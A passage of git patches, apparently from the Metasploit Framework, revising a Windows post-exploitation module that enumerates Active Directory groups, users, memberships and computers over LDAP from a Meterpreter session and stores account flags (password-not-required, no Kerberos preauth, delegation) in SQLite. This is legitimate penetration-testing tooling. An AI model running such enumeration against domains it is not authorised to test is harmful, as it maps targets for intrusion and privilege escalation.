'ADS_UF_LOCKOUT AS g_ADS_UF_LOCKOUT,'\ + 'ADS_UF_PASSWD_NOTREQD AS g_ADS_UF_PASSWD_NOTREQD,'\ + 'ADS_UF_PASSWD_CANT_CHANGE AS g_ADS_UF_PASSWD_CANT_CHANGE,'\ + 'ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED AS g_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED,'\ + 'ADS_UF_TEMP_DUPLICATE_ACCOUNT AS g_ADS_UF_TEMP_DUPLICATE_ACCOUNT,'\ + 'ADS_UF_NORMAL_ACCOUNT AS g_ADS_UF_NORMAL_ACCOUNT,'\ + 'ADS_UF_INTERDOMAIN_TRUST_ACCOUNT AS g_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT,'\ + 'ADS_UF_WORKSTATION_TRUST_ACCOUNT AS g_ADS_UF_WORKSTATION_TRUST_ACCOUNT,'\ + 'ADS_UF_SERVER_TRUST_ACCOUNT AS g_ADS_UF_SERVER_TRUST_ACCOUNT,'\ + 'ADS_UF_DONT_EXPIRE_PASSWD AS g_ADS_UF_DONT_EXPIRE_PASSWD,'\ + 'ADS_UF_MNS_LOGON_ACCOUNT AS g_ADS_UF_MNS_LOGON_ACCOUNT,'\ + 'ADS_UF_SMARTCARD_REQUIRED AS g_ADS_UF_SMARTCARD_REQUIRED,'\ + 'ADS_UF_TRUSTED_FOR_DELEGATION AS g_ADS_UF_TRUSTED_FOR_DELEGATION,'\ + 'ADS_UF_NOT_DELEGATED AS g_ADS_UF_NOT_DELEGATED,'\ + 'ADS_UF_USE_DES_KEY_ONLY AS g_ADS_UF_USE_DES_KEY_ONLY,'\ + 'ADS_UF_DONT_REQUIRE_PREAUTH AS g_ADS_UF_DONT_REQUIRE_PREAUTH,'\ + 'ADS_UF_PASSWORD_EXPIRED AS g_ADS_UF_PASSWORD_EXPIRED,'\ + 'ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION as g_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION' + db.execute(sql_view_users) return db, filename + rescue SQLite3::Exception => e print_error("Error(Database): #{e.message}") return From 36392ac0cd3374f877998cc6beab584c414c2a8d Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sat, 19 Dec 2015 00:48:41 +0000 Subject: [PATCH 110/686] All works --- .../windows/gather/ad_groupusers_to_sql.rb | 123 ++++++++++-------- 1 file changed, 68 insertions(+), 55 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 2b984caafc..a1609e4dab 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -521,67 +521,80 @@ class Metasploit3 < Msf::Post # Create the view for the AD Groups db.execute('DROP VIEW IF EXISTS view_ad_groups') sql_view_group = 'CREATE VIEW view_ad_groups AS SELECT '\ - 'rid AS u_rid,'\ - 'distinguishedName AS u_distinguishedName,'\ - 'sAMAccountType AS u_sAMAccountType,'\ - 'sAMAccountName AS u_sAMAccountName,'\ - 'groupType AS u_groupType,'\ - 'adminCount AS u_adminCount,'\ - 'description AS u_description,'\ - 'whenChanged AS u_whenChanged,'\ - 'whenCreated AS u_whenCreated,'\ - 'GT_GROUP_CREATED_BY_SYSTEM AS u_GT_GROUP_CREATED_BY_SYSTEM,'\ - 'GT_GROUP_SCOPE_GLOBAL AS u_GT_GROUP_SCOPE_GLOBAL,'\ - 'GT_GROUP_SCOPE_LOCAL AS u_GT_GROUP_SCOPE_LOCAL,'\ - 'GT_GROUP_SCOPE_UNIVERSAL AS u_GT_GROUP_SCOPE_UNIVERSAL,'\ - 'GT_GROUP_SAM_APP_BASIC AS u_GT_GROUP_SAM_APP_BASIC,'\ - 'GT_GROUP_SAM_APP_QUERY AS u_GT_GROUP_SAM_APP_QUERY,'\ - 'GT_GROUP_SECURITY AS u_GT_GROUP_SECURITY,'\ - 'GT_GROUP_DISTRIBUTION as U_GT_GROUP_DISTRIBUTION' + 'rid AS g_rid,'\ + 'distinguishedName AS g_distinguishedName,'\ + 'sAMAccountType AS g_sAMAccountType,'\ + 'ref_sAMAccountType.name AS g_sAMAccountType_Name,'\ + 'sAMAccountName AS g_sAMAccountName,'\ + 'groupType AS g_groupType,'\ + 'adminCount AS g_adminCount,'\ + 'description AS g_description,'\ + 'whenChanged AS g_whenChanged,'\ + 'whenCreated AS g_whenCreated,'\ + 'GT_GROUP_CREATED_BY_SYSTEM AS g_GT_GROUP_CREATED_BY_SYSTEM,'\ + 'GT_GROUP_SCOPE_GLOBAL AS g_GT_GROUP_SCOPE_GLOBAL,'\ + 'GT_GROUP_SCOPE_LOCAL AS g_GT_GROUP_SCOPE_LOCAL,'\ + 'GT_GROUP_SCOPE_UNIVERSAL AS g_GT_GROUP_SCOPE_UNIVERSAL,'\ + 'GT_GROUP_SAM_APP_BASIC AS g_GT_GROUP_SAM_APP_BASIC,'\ + 'GT_GROUP_SAM_APP_QUERY AS g_GT_GROUP_SAM_APP_QUERY,'\ + 'GT_GROUP_SECURITY AS g_GT_GROUP_SECURITY,'\ + 'GT_GROUP_DISTRIBUTION as U_GT_GROUP_DISTRIBUTION '\ + 'FROM ad_groups LEFT JOIN ref_sAMAccountType ON ref_sAMAccountType.id = ad_groups.sAMAccountType' db.execute(sql_view_group) # Create the view for the AD Users db.execute('DROP VIEW IF EXISTS view_ad_users') sql_view_users = 'CREATE VIEW view_ad_users AS SELECT '\ - 'rid AS g_rid,'\ - 'distinguishedName AS g_distinguishedName,'\ - 'description AS g_description,'\ - 'displayName AS g_displayName,'\ - 'sAMAccountType AS g_sAMAccountType,'\ - 'sAMAccountName AS g_sAMAccountName,'\ - 'logonCount AS g_logonCount,'\ - 'userAccountControl AS g_userAccountControl,'\ - 'primaryGroupID AS g_primaryGroupID,'\ - 'accountExpires AS g_accountExpires,'\ - 'adminCount AS g_adminCount,'\ - 'badPwdCount AS g_badPwdCount,'\ - 'userPrincipalName AS g_userPrincipalName,'\ - 'comments AS g_comments,'\ - 'title AS g_title,'\ - 'whenCreated AS g_whenCreated,'\ - 'whenChanged AS g_whenChanged,'\ - 'ADS_UF_SCRIPT AS g_ADS_UF_SCRIPT,'\ - 'ADS_UF_ACCOUNTDISABLE AS g_ADS_UF_ACCOUNTDISABLE,'\ - 'ADS_UF_HOMEDIR_REQUIRED AS g_ADS_UF_HOMEDIR_REQUIRED,'\ - 'ADS_UF_LOCKOUT AS g_ADS_UF_LOCKOUT,'\ - 'ADS_UF_PASSWD_NOTREQD AS g_ADS_UF_PASSWD_NOTREQD,'\ - 'ADS_UF_PASSWD_CANT_CHANGE AS g_ADS_UF_PASSWD_CANT_CHANGE,'\ - 'ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED AS g_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED,'\ - 'ADS_UF_TEMP_DUPLICATE_ACCOUNT AS g_ADS_UF_TEMP_DUPLICATE_ACCOUNT,'\ - 'ADS_UF_NORMAL_ACCOUNT AS g_ADS_UF_NORMAL_ACCOUNT,'\ - 'ADS_UF_INTERDOMAIN_TRUST_ACCOUNT AS g_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT,'\ - 'ADS_UF_WORKSTATION_TRUST_ACCOUNT AS g_ADS_UF_WORKSTATION_TRUST_ACCOUNT,'\ - 'ADS_UF_SERVER_TRUST_ACCOUNT AS g_ADS_UF_SERVER_TRUST_ACCOUNT,'\ - 'ADS_UF_DONT_EXPIRE_PASSWD AS g_ADS_UF_DONT_EXPIRE_PASSWD,'\ - 'ADS_UF_MNS_LOGON_ACCOUNT AS g_ADS_UF_MNS_LOGON_ACCOUNT,'\ - 'ADS_UF_SMARTCARD_REQUIRED AS g_ADS_UF_SMARTCARD_REQUIRED,'\ - 'ADS_UF_TRUSTED_FOR_DELEGATION AS g_ADS_UF_TRUSTED_FOR_DELEGATION,'\ - 'ADS_UF_NOT_DELEGATED AS g_ADS_UF_NOT_DELEGATED,'\ - 'ADS_UF_USE_DES_KEY_ONLY AS g_ADS_UF_USE_DES_KEY_ONLY,'\ - 'ADS_UF_DONT_REQUIRE_PREAUTH AS g_ADS_UF_DONT_REQUIRE_PREAUTH,'\ - 'ADS_UF_PASSWORD_EXPIRED AS g_ADS_UF_PASSWORD_EXPIRED,'\ - 'ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION as g_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION' + 'rid AS u_rid,'\ + 'distinguishedName AS u_distinguishedName,'\ + 'description AS u_description,'\ + 'displayName AS u_displayName,'\ + 'sAMAccountType AS u_sAMAccountType,'\ + 'ref_sAMAccountType.name AS u_sAMAccountType_Name,'\ + 'sAMAccountName AS u_sAMAccountName,'\ + 'logonCount AS u_logonCount,'\ + 'userAccountControl AS u_userAccountControl,'\ + 'primaryGroupID AS u_primaryGroupID,'\ + 'accountExpires AS u_accountExpires,'\ + 'adminCount AS u_adminCount,'\ + 'badPwdCount AS u_badPwdCount,'\ + 'userPrincipalName AS u_userPrincipalName,'\ + 'comments AS u_comments,'\ + 'title AS u_title,'\ + 'whenCreated AS u_whenCreated,'\ + 'whenChanged AS u_whenChanged,'\ + 'ADS_UF_SCRIPT AS u_ADS_UF_SCRIPT,'\ + 'ADS_UF_ACCOUNTDISABLE AS u_ADS_UF_ACCOUNTDISABLE,'\ + 'ADS_UF_HOMEDIR_REQUIRED AS u_ADS_UF_HOMEDIR_REQUIRED,'\ + 'ADS_UF_LOCKOUT AS u_ADS_UF_LOCKOUT,'\ + 'ADS_UF_PASSWD_NOTREQD AS u_ADS_UF_PASSWD_NOTREQD,'\ + 'ADS_UF_PASSWD_CANT_CHANGE AS u_ADS_UF_PASSWD_CANT_CHANGE,'\ + 'ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED AS u_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED,'\ + 'ADS_UF_TEMP_DUPLICATE_ACCOUNT AS u_ADS_UF_TEMP_DUPLICATE_ACCOUNT,'\ + 'ADS_UF_NORMAL_ACCOUNT AS u_ADS_UF_NORMAL_ACCOUNT,'\ + 'ADS_UF_INTERDOMAIN_TRUST_ACCOUNT AS u_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT,'\ + 'ADS_UF_WORKSTATION_TRUST_ACCOUNT AS u_ADS_UF_WORKSTATION_TRUST_ACCOUNT,'\ + 'ADS_UF_SERVER_TRUST_ACCOUNT AS u_ADS_UF_SERVER_TRUST_ACCOUNT,'\ + 'ADS_UF_DONT_EXPIRE_PASSWD AS u_ADS_UF_DONT_EXPIRE_PASSWD,'\ + 'ADS_UF_MNS_LOGON_ACCOUNT AS u_ADS_UF_MNS_LOGON_ACCOUNT,'\ + 'ADS_UF_SMARTCARD_REQUIRED AS u_ADS_UF_SMARTCARD_REQUIRED,'\ + 'ADS_UF_TRUSTED_FOR_DELEGATION AS u_ADS_UF_TRUSTED_FOR_DELEGATION,'\ + 'ADS_UF_NOT_DELEGATED AS u_ADS_UF_NOT_DELEGATED,'\ + 'ADS_UF_USE_DES_KEY_ONLY AS u_ADS_UF_USE_DES_KEY_ONLY,'\ + 'ADS_UF_DONT_REQUIRE_PREAUTH AS u_ADS_UF_DONT_REQUIRE_PREAUTH,'\ + 'ADS_UF_PASSWORD_EXPIRED AS u_ADS_UF_PASSWORD_EXPIRED,'\ + 'ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION as u_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION '\ + 'FROM ad_users LEFT JOIN ref_sAMAccountType ON ref_sAMAccountType.id = ad_users.sAMAccountType' db.execute(sql_view_users) + + # Create the view for the AD User/Group membership + db.execute('DROP VIEW IF EXISTS view_ad_mapping') + sql_view_mapping = 'CREATE VIEW view_ad_mapping AS SELECT view_ad_groups.*,view_ad_users.* FROM ad_mapping '\ + 'INNER JOIN view_ad_groups ON view_ad_groups.g_rid = ad_mapping.group_rid '\ + 'INNER JOIN view_ad_users ON view_ad_users.u_rid = ad_mapping.user_rid' + print_line sql_view_mapping + db.execute(sql_view_mapping) + return db, filename rescue SQLite3::Exception => e From c7f8450775a74b58c75244d82fcfed9fe7e5945d Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sat, 19 Dec 2015 01:11:20 +0000 Subject: [PATCH 111/686] Appears to work correctly --- .../windows/gather/ad_groupusers_to_sql.rb | 23 +++++++++++++++---- 1 file changed, 18 insertions(+), 5 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index a1609e4dab..95179fda32 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Post )) register_options([ - OptString.new('GROUP_FILTER', [true, 'Filter to identify groups', '(objectClass=group)']), + OptString.new('GROUP_FILTER', [true, 'Additional LDAP filters to perform when searching for initial groups', '']), OptBool.new('SHOW_USERGROUPS', [true, 'Show the user/group membership in a greppable form.', false]), OptBool.new('SHOW_COMPUTERS', [true, 'Show basic computer information in a greppable form.', false]), OptInt.new('THREADS', [true, 'Number of threads to spawn to gather membership of each group.', 20]) @@ -46,8 +46,13 @@ class Metasploit3 < Msf::Post # Download the list of groups from Active Directory vprint_status "Retrieving AD Groups" begin - group_fields = ['distinguishedName', 'objectSid', 'samAccountType', 'sAMAccountName', 'whenChanged', 'whenCreated', 'description', 'groupType', 'adminCount'] - groups = query(datastore['GROUP_FILTER'], max_search, group_fields) + group_fields = ['distinguishedName', 'objectSid', 'samAccountType', 'sAMAccountName', 'whenChanged', 'whenCreated', 'description', 'groupType', 'adminCount', 'comments'] + if datastore['GROUP_FILTER'] + group_query = "(&(objectClass=group)(#{datastore['GROUP_FILTER']}))" + else + group_query = "(objectClass=group)" + end + groups = query(group_query, max_search, group_fields) rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e print_error("Error(Group): #{e.message}") return @@ -98,6 +103,7 @@ class Metasploit3 < Msf::Post description: individual_group[6][:value].to_s, groupType: individual_group[7][:value].to_i, adminCount: individual_group[8][:value].to_i, + comments: individual_group[9][:value].to_s, # Specifies a group that is created by the system. GT_GROUP_CREATED_BY_SYSTEM: (grouptype_int & 0x00000001).zero? ? 0 : 1, # Specifies a group with global scope. @@ -220,7 +226,7 @@ class Metasploit3 < Msf::Post vprint_status "Retrieving computers" begin computer_filter = '(objectClass=computer)' - computer_fields = ['distinguishedName', 'objectSid', 'cn','dNSHostName', 'sAMAccountType', 'sAMAccountName', 'displayName', 'logonCount', 'userAccountControl', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount', 'operatingSystem', 'operatingSystemServicePack', 'operatingSystemVersion'] + computer_fields = ['distinguishedName', 'objectSid', 'cn','dNSHostName', 'sAMAccountType', 'sAMAccountName', 'displayName', 'logonCount', 'userAccountControl', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount', 'operatingSystem', 'operatingSystemServicePack', 'operatingSystemVersion', 'description', 'comments'] computers = query(computer_filter, max_search, computer_fields) computers[:results].each do |comp| @@ -250,6 +256,8 @@ class Metasploit3 < Msf::Post operatingSystem: comp[13][:value].to_s, operatingSystemServicePack: comp[14][:value].to_s, operatingSystemVersion: comp[15][:value].to_s, + description: comp[16][:value].to_s, + comments: comp[17][:value].to_s, #The login script is executed ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, #The user account is disabled. @@ -345,6 +353,8 @@ class Metasploit3 < Msf::Post 'userAccountControl INTEGER,'\ 'primaryGroupID INTEGER,'\ 'badPwdCount INTEGER,'\ + 'description TEXT,'\ + 'comments TEXT,'\ 'operatingSystem TEXT,'\ 'operatingSystemServicePack TEXT,'\ 'operatingSystemVersion TEXT,'\ @@ -383,6 +393,7 @@ class Metasploit3 < Msf::Post 'groupType INTEGER,'\ 'adminCount INTEGER,'\ 'description TEXT,'\ + 'comments TEXT,'\ 'whenChanged TEXT,'\ 'whenCreated TEXT,'\ 'GT_GROUP_CREATED_BY_SYSTEM INTEGER,'\ @@ -485,6 +496,8 @@ class Metasploit3 < Msf::Post 'sAMAccountName AS c_sAMAccountName,'\ 'dNSHostName AS c_dNSHostName,'\ 'displayName AS c_displayName,'\ + 'description AS c_description,'\ + 'comments AS c_comments,'\ 'logonCount AS c_logonCount,'\ 'userAccountControl AS c_userAccountControl,'\ 'primaryGroupID AS c_primaryGroupID,'\ @@ -529,6 +542,7 @@ class Metasploit3 < Msf::Post 'groupType AS g_groupType,'\ 'adminCount AS g_adminCount,'\ 'description AS g_description,'\ + 'comments AS g_comments,'\ 'whenChanged AS g_whenChanged,'\ 'whenCreated AS g_whenCreated,'\ 'GT_GROUP_CREATED_BY_SYSTEM AS g_GT_GROUP_CREATED_BY_SYSTEM,'\ @@ -592,7 +606,6 @@ class Metasploit3 < Msf::Post sql_view_mapping = 'CREATE VIEW view_ad_mapping AS SELECT view_ad_groups.*,view_ad_users.* FROM ad_mapping '\ 'INNER JOIN view_ad_groups ON view_ad_groups.g_rid = ad_mapping.group_rid '\ 'INNER JOIN view_ad_users ON view_ad_users.u_rid = ad_mapping.user_rid' - print_line sql_view_mapping db.execute(sql_view_mapping) return db, filename From 07e5f03abae92b272738395c50ff330738d972a5 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sat, 19 Dec 2015 01:58:29 +0000 Subject: [PATCH 112/686] Fixed --- modules/post/windows/gather/ad_groupusers_to_sql.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 95179fda32..1952d3ee57 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -338,6 +338,7 @@ class Metasploit3 < Msf::Post obj_temp = ::Dir::Tmpname filename = "#{obj_temp.tmpdir}/#{obj_temp.make_tmpname('ad_', 2)}.db" db = SQLite3::Database.new(filename) + db.type_translation = true # Create the table for the AD Computers db.execute('DROP TABLE IF EXISTS ad_computers') @@ -618,7 +619,9 @@ class Metasploit3 < Msf::Post # Convert the SID raw data to a string. TODO fix this mess.... # THIS NEEDS FIXING FIXME FIXME - def sid_hex_to_string(data) + def sid_hex_to_string(_data) + data = Rex::Text.to_ascii(_data) + print data.inspect sid = [] sid << data[0].to_s rid = '' From 872aeccbb642286a4f1993ab73aece2215e3b29a Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sat, 19 Dec 2015 02:02:40 +0000 Subject: [PATCH 113/686] Significant simplified the hex-to-SID parsing code because we only want the RID out of it --- .../windows/gather/ad_groupusers_to_sql.rb | 40 +++++-------------- 1 file changed, 11 insertions(+), 29 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 1952d3ee57..6bb121ea30 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Post next if !individual_group || individual_group.empty? || individual_group.nil? # Get the Group RID - group_sid, group_rid = sid_hex_to_string(individual_group[1][:value]) + group_rid = get_rid(individual_group[1][:value]).to_i # Perform the ADSI query to retrieve the effective users in each group (recursion) vprint_status "Retrieving members of #{individual_group[3][:value]}" @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Post # Add the group to the database # groupType parameter interpretation: https://msdn.microsoft.com/en-us/library/windows/desktop/ms675935(v=vs.85).aspx - sql_param_group = { rid: group_rid.to_i, + sql_param_group = { rid: group_rid, distinguishedName: individual_group[0][:value].to_s, sAMAccountType: individual_group[2][:value].to_i, sAMAccountName: individual_group[3][:value].to_s, @@ -129,14 +129,14 @@ class Metasploit3 < Msf::Post # Go through each group user next if users_in_group[:results].empty? users_in_group[:results].each do |group_user| - user_sid, user_rid = sid_hex_to_string(group_user[1][:value]) + user_rid = get_rid(group_user[1][:value]).to_i print_line "Group [#{individual_group[3][:value]}][#{group_rid}] has member [#{group_user[3][:value]}][#{user_rid}]" if datastore['SHOW_USERGROUPS'] uac_int = group_user[7][:value].to_i #Set this because it is used so frequently below # Add the group to the database # Also parse the ADF_ flags from userAccountControl: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832(v=vs.85).aspx - sql_param_user = { rid: user_rid.to_i, + sql_param_user = { rid: user_rid, distinguishedName: group_user[0][:value].to_s, sAMAccountType: group_user[2][:value].to_i, sAMAccountName: group_user[3][:value].to_s, @@ -208,8 +208,8 @@ class Metasploit3 < Msf::Post run_sqlite_query(db, 'ad_users', sql_param_user) # Now associate the user with the group - sql_param_mapping = { user_rid: user_rid.to_i, - group_rid: group_rid.to_i + sql_param_mapping = { user_rid: user_rid, + group_rid: group_rid } run_sqlite_query(db, 'ad_mapping', sql_param_mapping) end @@ -230,7 +230,7 @@ class Metasploit3 < Msf::Post computers = query(computer_filter, max_search, computer_fields) computers[:results].each do |comp| - computer_sid, computer_rid = sid_hex_to_string(comp[1][:value]) + computer_rid = get_rid(comp[1][:value]).to_i uac_int = comp[8][:value].to_i #Set this because it is used so frequently below @@ -240,7 +240,7 @@ class Metasploit3 < Msf::Post # (if you look at the objectClass for a computer account, it includes 'user') and, for efficiency, we should really store it all in one # table. However, the reality is that it will get annoying for users to have to remember to use the userAccountControl flags to work out whether # its a user or a computer and so, for convenience and ease of use, I have put them in completely separate tables. - sql_param_computer = { rid: computer_rid.to_i, + sql_param_computer = { rid: computer_rid, distinguishedName: comp[0][:value].to_s, cn: comp[2][:value].to_s, dNSHostName: comp[3][:value].to_s, @@ -617,26 +617,8 @@ class Metasploit3 < Msf::Post end end - # Convert the SID raw data to a string. TODO fix this mess.... - # THIS NEEDS FIXING FIXME FIXME - def sid_hex_to_string(_data) - data = Rex::Text.to_ascii(_data) - print data.inspect - sid = [] - sid << data[0].to_s - rid = '' - (6).downto(1) do |i| - rid += byte2hex(data[i, 1][0]) - end - sid << rid.to_i.to_s - sid += data.unpack("bbbbbbbbV*")[8..-1] - final_sid = "S-" + sid.join('-') - [final_sid, sid[-1]] - end - - def byte2hex(b) - ret = '%x' % (b.to_i & 0xff) - ret = '0' + ret if ret.length < 2 - ret + def get_rid(data) + sid = data.unpack("bbbbbbbbV*")[8..-1] + return sid[-1] end end From bb25c7606cd487d7c3d5ceeaf748aa47fcc9a00b Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sun, 20 Dec 2015 01:28:25 +0000 Subject: [PATCH 114/686] Restructuring to add SAM_ (userAccountControl) variables as fields directly --- .../windows/gather/ad_groupusers_to_sql.rb | 389 +++++++++--------- 1 file changed, 200 insertions(+), 189 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 6bb121ea30..aa86792a0f 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -95,34 +95,34 @@ class Metasploit3 < Msf::Post # Add the group to the database # groupType parameter interpretation: https://msdn.microsoft.com/en-us/library/windows/desktop/ms675935(v=vs.85).aspx sql_param_group = { rid: group_rid, - distinguishedName: individual_group[0][:value].to_s, - sAMAccountType: individual_group[2][:value].to_i, - sAMAccountName: individual_group[3][:value].to_s, - whenChanged: individual_group[4][:value].to_s, - whenCreated: individual_group[5][:value].to_s, - description: individual_group[6][:value].to_s, - groupType: individual_group[7][:value].to_i, - adminCount: individual_group[8][:value].to_i, - comments: individual_group[9][:value].to_s, + g_distinguishedName: individual_group[0][:value].to_s, + g_sAMAccountType: individual_group[2][:value].to_i, + g_sAMAccountName: individual_group[3][:value].to_s, + g_whenChanged: individual_group[4][:value].to_s, + g_whenCreated: individual_group[5][:value].to_s, + g_description: individual_group[6][:value].to_s, + g_groupType: individual_group[7][:value].to_i, + g_adminCount: individual_group[8][:value].to_i, + g_comments: individual_group[9][:value].to_s, # Specifies a group that is created by the system. - GT_GROUP_CREATED_BY_SYSTEM: (grouptype_int & 0x00000001).zero? ? 0 : 1, + g_GT_GROUP_CREATED_BY_SYSTEM: (grouptype_int & 0x00000001).zero? ? 0 : 1, # Specifies a group with global scope. - GT_GROUP_SCOPE_GLOBAL: (grouptype_int & 0x00000002).zero? ? 0 : 1, + g_GT_GROUP_SCOPE_GLOBAL: (grouptype_int & 0x00000002).zero? ? 0 : 1, # Specifies a group with local scope. - GT_GROUP_SCOPE_LOCAL: (grouptype_int & 0x00000004).zero? ? 0 : 1, + g_GT_GROUP_SCOPE_LOCAL: (grouptype_int & 0x00000004).zero? ? 0 : 1, # Specifies a group with universal scope. - GT_GROUP_SCOPE_UNIVERSAL: (grouptype_int & 0x00000008).zero? ? 0 : 1, + g_GT_GROUP_SCOPE_UNIVERSAL: (grouptype_int & 0x00000008).zero? ? 0 : 1, # Specifies an APP_BASIC group for Windows Server Authorization Manager. - GT_GROUP_SAM_APP_BASIC: (grouptype_int & 0x00000010).zero? ? 0 : 1, + g_GT_GROUP_SAM_APP_BASIC: (grouptype_int & 0x00000010).zero? ? 0 : 1, # Specifies an APP_QUERY group for Windows Server Authorization Manager. - GT_GROUP_SAM_APP_QUERY: (grouptype_int & 0x00000020).zero? ? 0 : 1, + g_GT_GROUP_SAM_APP_QUERY: (grouptype_int & 0x00000020).zero? ? 0 : 1, # Specifies a security group. If this flag is not set, then the group is a distribution group. - GT_GROUP_SECURITY: (grouptype_int & 0x80000000).zero? ? 0 : 1, + g_GT_GROUP_SECURITY: (grouptype_int & 0x80000000).zero? ? 0 : 1, # The inverse of the flag above. Technically GT_GROUP_SECURITY=0 makes it a distribution # group so this is arguably redundant, but I have included it for ease. It makes a lot more sense # to set DISTRIBUTION=1 in a query when your mind is on other things to remember that # DISTRIBUTION is in fact the inverse of SECURITY...:) - GT_GROUP_DISTRIBUTION: (grouptype_int & 0x80000000).zero? ? 1 : 0, + g_GT_GROUP_DISTRIBUTION: (grouptype_int & 0x80000000).zero? ? 1 : 0, } run_sqlite_query(db, 'ad_groups', sql_param_group) @@ -136,74 +136,74 @@ class Metasploit3 < Msf::Post # Add the group to the database # Also parse the ADF_ flags from userAccountControl: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832(v=vs.85).aspx - sql_param_user = { rid: user_rid, - distinguishedName: group_user[0][:value].to_s, - sAMAccountType: group_user[2][:value].to_i, - sAMAccountName: group_user[3][:value].to_s, - displayName: group_user[4][:value].to_s, - description: group_user[5][:value].to_s, - logonCount: group_user[6][:value].to_i, - userAccountControl: uac_int, - userPrincipalName: group_user[8][:value].to_s, - whenChanged: group_user[9][:value].to_s, - whenCreated: group_user[10][:value].to_s, - primaryGroupID: group_user[11][:value].to_i, - badPwdCount: group_user[12][:value].to_i, - comments: group_user[13][:value].to_s, - title: group_user[14][:value].to_s, - accountExpires: group_user[15][:value].to_i, + sql_param_user = { u_rid: user_rid, + u_distinguishedName: group_user[0][:value].to_s, + u_sAMAccountType: group_user[2][:value].to_i, + u_sAMAccountName: group_user[3][:value].to_s, + u_displayName: group_user[4][:value].to_s, + u_description: group_user[5][:value].to_s, + u_logonCount: group_user[6][:value].to_i, + u_userAccountControl: uac_int, + u_userPrincipalName: group_user[8][:value].to_s, + u_whenChanged: group_user[9][:value].to_s, + u_whenCreated: group_user[10][:value].to_s, + u_primaryGroupID: group_user[11][:value].to_i, + u_badPwdCount: group_user[12][:value].to_i, + u_comments: group_user[13][:value].to_s, + u_title: group_user[14][:value].to_s, + u_accountExpires: group_user[15][:value].to_i, #Indicates that a given object has had its ACLs changed to a more secure value by the #system because it was a member of one of the administrative groups (directly or transitively). - adminCount: group_user[16][:value].to_i, + u_adminCount: group_user[16][:value].to_i, #The login script is executed - ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, + u_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, #The user account is disabled. - ADS_UF_ACCOUNTDISABLE: (uac_int & 0x00000002).zero? ? 0 : 1, + u_ADS_UF_ACCOUNTDISABLE: (uac_int & 0x00000002).zero? ? 0 : 1, #The home directory is required. - ADS_UF_HOMEDIR_REQUIRED: (uac_int & 0x00000008).zero? ? 0 : 1, + u_ADS_UF_HOMEDIR_REQUIRED: (uac_int & 0x00000008).zero? ? 0 : 1, #The account is currently locked out. - ADS_UF_LOCKOUT: (uac_int & 0x00000010).zero? ? 0 : 1, + u_ADS_UF_LOCKOUT: (uac_int & 0x00000010).zero? ? 0 : 1, #No password is required. - ADS_UF_PASSWD_NOTREQD: (uac_int & 0x00000020).zero? ? 0 : 1, + u_ADS_UF_PASSWD_NOTREQD: (uac_int & 0x00000020).zero? ? 0 : 1, #The user cannot change the password. - ADS_UF_PASSWD_CANT_CHANGE: (uac_int & 0x00000040).zero? ? 0 : 1, + u_ADS_UF_PASSWD_CANT_CHANGE: (uac_int & 0x00000040).zero? ? 0 : 1, #The user can send an encrypted password. - ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (uac_int & 0x00000080).zero? ? 0 : 1, + u_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (uac_int & 0x00000080).zero? ? 0 : 1, #This is an account for users whose primary account is in another domain. This account #provides user access to this domain, but not to any domain that trusts this domain. #Also known as a local user account. - ADS_UF_TEMP_DUPLICATE_ACCOUNT: (uac_int & 0x00000100).zero? ? 0 : 1, + 